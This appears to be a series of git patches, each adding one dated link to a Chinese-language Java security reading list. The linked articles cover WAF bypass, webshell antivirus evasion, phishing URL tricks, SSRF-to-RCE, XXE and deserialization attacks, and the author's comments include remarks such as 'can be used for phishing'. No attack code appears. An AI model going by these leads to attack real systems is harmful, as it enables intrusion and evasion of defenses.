"b/java\346\227\245\345\270\270/Readme.md" index bc75483..15f4423 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -268,3 +268,4 @@ + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** ++ 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** From fb4d535ca76fe7bf49c67b050c659a5b376ad454 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 21:01:02 +0800 Subject: [PATCH 275/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 15f4423..ea9768f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -269,3 +269,4 @@ + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** ++ 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) From 12a737174f71891b9358c0d1d9be4bd120cf2aeb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Feb 2023 17:47:26 +0800 Subject: [PATCH 276/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ea9768f..0133fcb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -270,3 +270,4 @@ + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) ++ 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) From 02f2c95f5bc469d6fccb1a0414cd3a41b9e547c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 13:05:11 +0800 Subject: [PATCH 277/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0133fcb..b3be6a3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -271,3 +271,4 @@ + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) ++ 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** From ac094e42846e39b6174bb1bfc673d45d2f0d322d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 15:56:44 +0800 Subject: [PATCH 278/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b3be6a3..70028f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -272,3 +272,4 @@ + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** ++ 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** From b503047ef4c3079a5a705a93c01eb2c8e5e4f15d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 16 Feb 2023 00:11:53 +0800 Subject: [PATCH 279/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 70028f4..d955a35 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -273,3 +273,4 @@ + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** ++ 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** From cc284e79c6d34b2f343a438c11c99854c2d0f43f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Feb 2023 22:31:23 +0800 Subject: [PATCH 280/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d955a35..4932f67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -274,3 +274,4 @@ + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** ++ 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** From 4e0ce4ecefb4d473bf9604f203e102eb9fc9c419 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 21:12:18 +0800 Subject: [PATCH 281/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4932f67..ba1ceb2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -275,3 +275,4 @@ + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** ++ 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** From f3396a31db8d7b0fde4404991fd9a08f2f105937 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 23:54:43 +0800 Subject: [PATCH 282/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ba1ceb2..b5df6e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -276,3 +276,4 @@ + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** ++ 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** From e13aa0d4fe761514ead4608b66d4afd3a03a6ea4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 13:48:16 +0800 Subject: [PATCH 283/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5df6e9..51cc13e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -277,3 +277,4 @@ + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** ++ 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** From 71c867e35aee0a2fc12925d5e0586b1e0d74e3df Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 14:03:49 +0800 Subject: [PATCH 284/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 51cc13e..e99a5ff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -278,3 +278,4 @@ + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** ++ 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** From d29418b5c34566a622647549ba52971f1ad1bad6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 23:16:45 +0800 Subject: [PATCH 285/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e99a5ff..190a594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -279,3 +279,4 @@ + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** ++ 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) From 1f02625eb06ca1416d472985025e19a948f56ea9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Feb 2023 14:26:43 +0800 Subject: [PATCH 286/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 190a594..d0965a9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -280,3 +280,4 @@ + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) ++ 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) From 68e880256f1f0caa55e67c1c47f9cc1bd274001f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Feb 2023 18:24:28 +0800 Subject: [PATCH 287/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d0965a9..ecda1e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -281,3 +281,4 @@ + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) ++ 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) From d3faec268f216b3d67813d249a772e8f2d059165 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:11:15 +0800 Subject: [PATCH 288/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ecda1e9..d007b10 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -282,3 +282,4 @@ + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) ++ 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 8f5b383daf528198c5a5a3af50847a27ac338569 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:26:27 +0800 Subject: [PATCH 289/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d007b10..34b177d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -283,3 +283,4 @@ + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From a647c3832d3d6ee4f99d95cab58579f36286c394 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 23:35:08 +0800 Subject: [PATCH 290/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 34b177d..343a0e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -284,3 +284,4 @@ + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** From bb2868e6ac6d1d7dd3db990593907d155c71aa67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:08:05 +0800 Subject: [PATCH 291/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 343a0e9..93ff134 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -285,3 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 